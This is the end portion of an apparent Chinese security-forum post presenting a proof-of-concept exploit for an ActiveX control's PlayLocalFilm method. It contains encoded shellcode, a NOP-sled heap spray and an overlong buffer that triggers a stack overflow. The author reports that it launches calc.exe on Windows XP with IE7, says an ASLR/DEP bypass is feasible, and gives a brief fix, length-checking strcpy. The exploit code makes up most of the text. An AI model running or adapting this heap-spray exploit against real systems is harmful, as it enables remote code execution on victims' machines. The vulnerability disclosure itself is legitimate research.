'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();
for( counter=0; counter<200; counter++)
memory[counter]= block + shellcode;
buffer='';
for( counter=0; counter<=1100; counter++)
buffer+=unescape("%0D%0D%0D%0D");
target.PlayLocalFilm(buffer);
</script>
</body>
</html>
xp,IE7下弹出calc.exe
由于是典型BOF,ALSR,DEP,是可以写POC的,还是等下回吧,太懒了。
修复方案:
strcpy要校验长度呀.
赞赏
|
|
|---|---|
|
|
赞赏
雪币:
留言:
